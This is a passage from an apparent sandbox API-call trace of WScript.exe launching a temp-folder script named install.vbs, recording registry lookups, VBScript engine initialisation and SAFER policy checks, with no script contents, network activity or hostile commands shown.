pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0292.823] RegCloseKey (hKey=0xa4) returned 0x0 [0292.823] RegCloseKey (hKey=0xa0) returned 0x0 [0292.823] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff664 | out: phkResult=0x2ff664*=0xa0) returned 0x0 [0292.823] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff660 | out: phkResult=0x2ff660*=0xa4) returned 0x0 [0292.823] RegQueryValueExW (in: hKey=0xa4, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2fe9f0, lpData=0x2fe9f4, lpcbData=0x2fe9ec*=0x400 | out: lpType=0x2fe9f0*=0x0, lpData=0x2fe9f4*=0x2, lpcbData=0x2fe9ec*=0x400) returned 0x2 [0292.823] RegQueryValueExW (in: hKey=0xa0, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x2fe9f0, lpData=0x2fe9f4, lpcbData=0x2fe9ec*=0x400 | out: lpType=0x2fe9f0*=0x0, lpData=0x2fe9f4*=0x2, lpcbData=0x2fe9ec*=0x400) returned 0x2 [0292.823] RegQueryValueExW (in: hKey=0xa4, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x2fe9f0, lpData=0x2fe9f4, lpcbData=0x2fe9ec*=0x400 | out: lpType=0x2fe9f0*=0x0, lpData=0x2fe9f4*=0x2, lpcbData=0x2fe9ec*=0x400) returned 0x2 [0292.823] RegCloseKey (hKey=0xa4) returned 0x0 [0292.824] RegCloseKey (hKey=0xa0) returned 0x0 [0292.824] GetACP () returned 0x4e4 [0292.824] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0292.824] GetProcAddress (hModule=0x769b0000, lpProcName="HeapSetInformation") returned 0x769c5609 [0292.824] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0292.824] FreeLibrary (hLibModule=0x769b0000) returned 1 [0292.824] ??2@YAPAXI@Z () returned 0x81380 [0292.824] CoRegisterMessageFilter (in: lpMessageFilter=0x81380, lplpMessageFilter=0x81388 | out: lplpMessageFilter=0x81388*=0x0) returned 0x0 [0292.824] IUnknown:AddRef (This=0x81380) returned 0x2 [0292.824] GetModuleFileNameW (in: hModule=0x7e0000, lpFilename=0x2ff8d4, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\WScript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe")) returned 0x1f [0292.825] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WScript.exe", lpdwHandle=0x2ff2e8 | out: lpdwHandle=0x2ff2e8) returned 0x704 [0292.825] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x2febd0 | out: lpData=0x2febd0) returned 1 [0292.826] VerQueryValueW (in: pBlock=0x2febd0, lpSubBlock="\\", lplpBuffer=0x2ff2e4, puLen=0x2ff2e0 | out: lplpBuffer=0x2ff2e4*=0x2febf8, puLen=0x2ff2e0) returned 1 [0292.826] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff2f8 | out: phkResult=0x2ff2f8*=0xa0) returned 0x0 [0292.826] RegQueryValueExW (in: hKey=0xa0, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2fe6c4, lpData=0x2fe6c8, lpcbData=0x2fe6c0*=0x400 | out: lpType=0x2fe6c4*=0x0, lpData=0x2fe6c8*=0xcd, lpcbData=0x2fe6c0*=0x400) returned 0x2 [0292.826] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff2f4 | out: phkResult=0x2ff2f4*=0xa4) returned 0x0 [0292.826] RegQueryValueExW (in: hKey=0xa4, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x2ff2bc, lpData=0x2ff2f0, lpcbData=0x2ff2c4*=0x4 | out: lpType=0x2ff2bc*=0x0, lpData=0x2ff2f0*=0x5a, lpcbData=0x2ff2c4*=0x4) returned 0x2 [0292.826] RegQueryValueExW (in: hKey=0xa4, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x2fe6c4, lpData=0x2fe6c8, lpcbData=0x2fe6c0*=0x400 | out: lpType=0x2fe6c4*=0x0, lpData=0x2fe6c8*=0xcd, lpcbData=0x2fe6c0*=0x400) returned 0x2 [0292.826] RegQueryValueExW (in: hKey=0xa0, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x2ff2bc, lpData=0x2ff2f0, lpcbData=0x2ff2c4*=0x4 | out: lpType=0x2ff2bc*=0x0, lpData=0x2ff2f0*=0x5a, lpcbData=0x2ff2c4*=0x4) returned 0x2 [0292.826] RegQueryValueExW (in: hKey=0xa0, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x2fe6c4, lpData=0x2fe6c8, lpcbData=0x2fe6c0*=0x400 | out: lpType=0x2fe6c4*=0x1, lpData="1", lpcbData=0x2fe6c0*=0x4) returned 0x0 [0292.826] lstrlenW (lpString="1") returned 1 [0292.826] lstrlenW (lpString="0") returned 1 [0292.826] lstrlenW (lpString="1") returned 1 [0292.826] lstrlenW (lpString="no") returned 2 [0292.826] lstrlenW (lpString="1") returned 1 [0292.826] lstrlenW (lpString="false") returned 5 [0292.826] RegCloseKey (hKey=0xa4) returned 0x0 [0292.826] RegCloseKey (hKey=0xa0) returned 0x0 [0292.826] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x2ff304, lpdwDisposition=0x0 | out: phkResult=0x2ff304*=0xa0, lpdwDisposition=0x0) returned 0x0 [0292.827] RegQueryValueExW (in: hKey=0xa0, lpValueName="Timeout", lpReserved=0x0, lpType=0x2ff2c8, lpData=0x2ff2f8, lpcbData=0x2ff2d0*=0x4 | out: lpType=0x2ff2c8*=0x0, lpData=0x2ff2f8*=0x40, lpcbData=0x2ff2d0*=0x4) returned 0x2 [0292.827] RegQueryValueExW (in: hKey=0xa0, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x2fe6d0, lpData=0x2fe6d4, lpcbData=0x2fe6cc*=0x400 | out: lpType=0x2fe6d0*=0x1, lpData="1", lpcbData=0x2fe6cc*=0x4) returned 0x0 [0292.827] lstrlenW (lpString="1") returned 1 [0292.827] lstrlenW (lpString="0") returned 1 [0292.827] lstrlenW (lpString="1") returned 1 [0292.827] lstrlenW (lpString="no") returned 2 [0292.827] lstrlenW (lpString="1") returned 1 [0292.827] lstrlenW (lpString="false") returned 5 [0292.827] RegCloseKey (hKey=0xa0) returned 0x0 [0292.827] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x2ff304, lpdwDisposition=0x0 | out: phkResult=0x2ff304*=0xa0, lpdwDisposition=0x0) returned 0x0 [0292.827] RegQueryValueExW (in: hKey=0xa0, lpValueName="Timeout", lpReserved=0x0, lpType=0x2ff2c8, lpData=0x2ff2f8, lpcbData=0x2ff2d0*=0x4 | out: lpType=0x2ff2c8*=0x0, lpData=0x2ff2f8*=0x40, lpcbData=0x2ff2d0*=0x4) returned 0x2 [0292.827] RegQueryValueExW (in: hKey=0xa0, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x2fe6d0, lpData=0x2fe6d4, lpcbData=0x2fe6cc*=0x400 | out: lpType=0x2fe6d0*=0x0, lpData=0x2fe6d4*=0x31, lpcbData=0x2fe6cc*=0x400) returned 0x2 [0292.827] RegCloseKey (hKey=0xa0) returned 0x0 [0292.827] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\install.vbs") returned 48 [0292.827] lstrlenW (lpString="vbs") returned 3 [0292.827] lstrlenW (lpString="WSH") returned 3 [0292.827] ??2@YAPAXI@Z () returned 0x81398 [0292.828] LoadStringW (in: hInstance=0x7e0000, uID=0x9c5, lpBuffer=0x2fd654, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0292.828] LoadTypeLib (in: szFile="C:\\Windows\\SysWOW64\\WScript.exe", pptlib=0x2fee7c*=0x0 | out: pptlib=0x2fee7c*=0x380038) returned 0x0 [0292.843] ITypeLib:GetTypeInfoOfGuid (in: This=0x380038, GUID=0x7e1acc, ppTInfo=0x2fee64 | out: ppTInfo=0x2fee64*=0x3810cc) returned 0x0 [0293.102] ITypeInfo:GetRefTypeOfImplType (in: This=0x3810cc, index=0xffffffff, pRefType=0x2fee58 | out: pRefType=0x2fee58*=0xfffffffe) returned 0x0 [0293.102] ITypeInfo:GetRefTypeInfo (in: This=0x3810cc, hreftype=0xfffffffe, ppTInfo=0x7f9060 | out: ppTInfo=0x7f9060*=0x3810f8) returned 0x0 [0293.102] IUnknown:Release (This=0x3810cc) returned 0x1 [0293.102] ??2@YAPAXI@Z () returned 0x824e8 [0293.103] ??2@YAPAXI@Z () returned 0x82540 [0293.103] ??2@YAPAXI@Z () returned 0x82578 [0293.103] ITypeLib:GetTypeInfoOfGuid (in: This=0x380038, GUID=0x7e3c7c, ppTInfo=0x2fee54 | out: ppTInfo=0x2fee54*=0x381124) returned 0x0 [0293.103] ITypeInfo:GetRefTypeOfImplType (in: This=0x381124, index=0xffffffff, pRefType=0x2fee48 | out: pRefType=0x2fee48*=0xfffffffe) returned 0x0 [0293.103] ITypeInfo:GetRefTypeInfo (in: This=0x381124, hreftype=0xfffffffe, ppTInfo=0x7f90a0 | out: ppTInfo=0x7f90a0*=0x381150) returned 0x0 [0293.103] IUnknown:Release (This=0x381124) returned 0x1 [0293.103] ITypeLib:GetTypeInfoOfGuid (in: This=0x380038, GUID=0x7e3c8c, ppTInfo=0x2fee54 | out: ppTInfo=0x2fee54*=0x38117c) returned 0x0 [0293.103] ITypeInfo:GetRefTypeOfImplType (in: This=0x38117c, index=0xffffffff, pRefType=0x2fee48 | out: pRefType=0x2fee48*=0xfffffffe) returned 0x0 [0293.103] ITypeInfo:GetRefTypeInfo (in: This=0x38117c, hreftype=0xfffffffe, ppTInfo=0x7f90c0 | out: ppTInfo=0x7f90c0*=0x3811a8) returned 0x0 [0293.103] IUnknown:Release (This=0x38117c) returned 0x1 [0293.103] ITypeLib:GetTypeInfoOfGuid (in: This=0x380038, GUID=0x7e1cac, ppTInfo=0x2fee54 | out: ppTInfo=0x2fee54*=0x3811d4) returned 0x0 [0293.103] ITypeInfo:GetRefTypeOfImplType (in: This=0x3811d4, index=0xffffffff, pRefType=0x2fee48 | out: pRefType=0x2fee48*=0xfffffffe) returned 0x0 [0293.103] ITypeInfo:GetRefTypeInfo (in: This=0x3811d4, hreftype=0xfffffffe, ppTInfo=0x7f9080 | out: ppTInfo=0x7f9080*=0x381200) returned 0x0 [0293.103] IUnknown:Release (This=0x3811d4) returned 0x1 [0293.103] IUnknown:Release (This=0x380038) returned 0x4 [0293.103] ??2@YAPAXI@Z () returned 0x825a8 [0293.104] GetCurrentThreadId () returned 0xd70 [0293.104] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xf0 [0293.104] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7e2f25, lpParameter=0x825a8, dwCreationFlags=0x0, lpThreadId=0x825bc | out: lpThreadId=0x825bc*=0xd7c) returned 0xf8 [0293.105] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x2ff07c*=0xf0, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0293.172] CloseHandle (hObject=0xf0) returned 1 [0293.172] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\install.vbs", nBufferLength=0x104, lpBuffer=0x2ff0dc, lpFilePart=0x2ff0c8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\install.vbs", lpFilePart=0x2ff0c8*="install.vbs") returned 0x30 [0293.173] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".vbs", ulOptions=0x0, samDesired=0x20019, phkResult=0x2fe670 | out: phkResult=0x2fe670*=0x10a) returned 0x0 [0293.173] RegQueryValueExW (in: hKey=0x10a, lpValueName=0x0, lpReserved=0x0, lpType=0x2fe638, lpData=0x2fe674, lpcbData=0x2fe63c*=0x800 | out: lpType=0x2fe638*=0x1, lpData="VBSFile", lpcbData=0x2fe63c*=0x10) returned 0x0 [0293.173] RegCloseKey (hKey=0x10a) returned 0x0 [0293.173] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2fe670 | out: phkResult=0x2fe670*=0x10a) returned 0x0 [0293.174] RegQueryValueExW (in: hKey=0x10a, lpValueName=0x0, lpReserved=0x0, lpType=0x2fe638, lpData=0x2feeac, lpcbData=0x2fe63c*=0x200 | out: lpType=0x2fe638*=0x1, lpData="VBScript", lpcbData=0x2fe63c*=0x12) returned 0x0 [0293.174] RegCloseKey (hKey=0x10a) returned 0x0 [0293.174] ??2@YAPAXI@Z () returned 0x82878 [0293.174] GetProcessHeap () returned 0x360000 [0293.174] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x2000) returned 0x385450 [0293.174] CLSIDFromString (in: lpsz="VBScript", pclsid=0x2fee7c | out: pclsid=0x2fee7c*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0 [0293.175] CoCreateInstance (in: rclsid=0x2fee7c*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x7e1aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fee78 | out: ppv=0x2fee78*=0x82a28) returned 0x0 [0293.619] malloc (_Size=0x80) returned 0x82960 [0293.619] __dllonexit () returned 0x72b77164 [0293.620] __dllonexit () returned 0x72b7717e [0293.620] __dllonexit () returned 0x72b77198 [0293.620] GetUserDefaultLCID () returned 0x409 [0293.620] GetVersion () returned 0x1db10106 [0293.620] DllGetClassObject (in: rclsid=0x388c8c*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), riid=0x76ecee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fe164 | out: ppv=0x2fe164*=0x829e8) returned 0x0 [0293.620] ??2@YAPAXI@Z () returned 0x829e8 [0293.621] VBScriptEngine5:IClassFactory:CreateInstance (in: This=0x829e8, pUnkOuter=0x0, riid=0x2feb10*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2fe150 | out: ppvObject=0x2fe150*=0x82a28) returned 0x0 [0293.621] ??2@YAPAXI@Z () returned 0x82a28 [0293.621] GetUserDefaultLCID () returned 0x409 [0293.621] GetACP () returned 0x4e4 [0293.621] VBScriptEngine5:IUnknown:AddRef (This=0x82a28) returned 0x2 [0293.621] VBScriptEngine5:IUnknown:Release (This=0x82a28) returned 0x1 [0293.621] VBScriptEngine5:IUnknown:Release (This=0x829e8) returned 0x0 [0293.621] ??3@YAXPAX@Z () returned 0x1 [0293.621] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x82a28, riid=0x7e1aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2fee40 | out: ppvObject=0x2fee40*=0x82a28) returned 0x0 [0293.622] VBScriptEngine5:IUnknown:Release (This=0x82a28) returned 0x1 [0293.622] GetCurrentThreadId () returned 0xd70 [0293.622] ??2@YAPAXI@Z () returned 0x82c30 [0293.622] GetCurrentThreadId () returned 0xd70 [0293.622] ??2@YAPAXI@Z () returned 0x813e8 [0293.622] ??2@YAPAXI@Z () returned 0x829e8 [0293.622] ??2@YAPAXI@Z () returned 0x82cf0 [0293.622] ??2@YAPAXI@Z () returned 0x82d70 [0293.622] GetCurrentThreadId () returned 0xd70 [0293.622] ??2@YAPAXI@Z () returned 0x82d98 [0293.622] GetUserDefaultLCID () returned 0x409 [0293.622] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0293.623] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x2fee30, cchData=6 | out: lpLCData="1252") returned 5 [0293.623] IsValidCodePage (CodePage=0x4e4) returned 1 [0293.623] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76e80000 [0293.623] GetProcAddress (hModule=0x76e80000, lpProcName="CoCreateInstance") returned 0x76ec9d0b [0293.623] CoCreateInstance (in: rclsid=0x72b6b234*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x72b6b244*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x82c04 | out: ppv=0x82c04*=0x379d08) returned 0x0 [0293.624] IUnknown:AddRef (This=0x379d08) returned 0x2 [0293.624] GetCurrentProcessId () returned 0xd6c [0293.624] GetCurrentThreadId () returned 0xd70 [0293.624] GetTickCount () returned 0x1d64ec0 [0293.624] ISystemDebugEventFire:BeginSession (This=0x379d08, guidSourceID=0x72b6b308, strSessionName="VBScript:00003436:00003440:30822080") returned 0x0 [0293.624] GetCurrentThreadId () returned 0xd70 [0293.624] ??2@YAPAXI@Z () returned 0x82de8 [0293.624] ??2@YAPAXI@Z () returned 0x82e18 [0293.624] malloc (_Size=0x40) returned 0x82ea8 [0293.624] malloc (_Size=0x104) returned 0x82ef0 [0293.625] GetCurrentThreadId () returned 0xd70 [0293.625] ??2@YAPAXI@Z () returned 0x83000 [0293.625] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\install.vbs" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\install.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x124 [0293.625] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x21c [0293.625] CreateFileMappingA (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x21c, lpName=0x0) returned 0x128 [0293.626] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xb0000 [0293.628] GetVersionExA (in: lpVersionInformation=0x2fef8c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x76ffc699, dwMinorVersion=0x2ff010, dwBuildNumber=0x76ffc6f3, dwPlatformId=0x779fffa6, szCSDVersion="øçþv\x04ð/") | out: lpVersionInformation=0x2fef8c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0293.628] IsTextUnicode (in: lpv=0xb0000, iSize=540, lpiResult=0x2ff038 | out: lpiResult=0x2ff038) returned 1 [0293.629] UnmapViewOfFile (lpBaseAddress=0xb0000) returned 1 [0293.629] CloseHandle (hObject=0x128) returned 1 [0293.629] CloseHandle (hObject=0x124) returned 1 [0293.629] GetSystemDirectoryA (in: lpBuffer=0x2feffb, uSize=0x0 | out: lpBuffer="") returned 0x14 [0293.630] ??2@YAPAXI@Z () returned 0x83030 [0293.630] GetSystemDirectoryA (in: lpBuffer=0x83030, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0293.632] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x76c20000 [0293.633] ??3@YAXPAX@Z () returned 0x1 [0293.633] GetProcAddress (hModule=0x76c20000, lpProcName="SaferIdentifyLevel") returned 0x76c42102 [0293.634] GetProcAddress (hModule=0x76c20000, lpProcName="SaferComputeTokenFromLevel") returned 0x76c43352 [0293.634] GetProcAddress (hModule=0x76c20000, lpProcName="SaferCloseLevel") returned 0x76c43825 [0293.634] IdentifyCodeAuthzLevelW () Thread: id = 482 os_tid = 0x6c4 Thread: id = 483 os_tid = 0xd7c [0293.165] GetClassInfoA (in: hInstance=0x7e0000, lpClassName="WSH-Timer", lpWndClass=0x258fad4 | out: lpWndClass=0x258fad4) returned 0 [0293.166] RegisterClassA (lpWndClass=0x258fad4) returned 0x2ac059 [0293.166] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0x7e0000, lpParam=0x825a8) returned 0x60316 [0293.166] GetWindowLongA (hWnd=0x60316, nIndex=-21) returned 0 [0293.166] NtdllDefWindowProc_A (hWnd=0x60316, Msg=0x24, wParam=0x0, lParam=0x258f6c8) returned 0x0 [0293.167] GetWindowLongA (hWnd=0x60316, nIndex=-21) returned 0 [0293.167] SetWindowLongA (hWnd=0x60316, nIndex=-21, dwNewLong=533928) returned 0 [0293.167] NtdllDefWindowProc_A (hWnd=0x60316, Msg=0x81, wParam=0x0, lParam=0x258f6bc) returned 0x1 [0293.169] GetWindowLongA (hWnd=0x60316, nIndex=-21) returned 533928 [0293.169] NtdllDefWindowProc_A (hWnd=0x60316, Msg=0x83, wParam=0x0, lParam=0x258f6a8) returned 0x0 [0293.172] GetWindowLongA (hWnd=0x60316, nIndex=-21) returned 533928 [0293.172] NtdllDefWindowProc_A (hWnd=0x60316, Msg=0x1, wParam=0x0, lParam=0x258f6bc) returned 0x0 [0293.172] SetEvent (hEvent=0xf0) returned 1 [0293.515] GetMessageA (lpMsg=0x258fafc, hWnd=0x60316, wMsgFilterMin=0x0, wMsgFilterMax=0x0)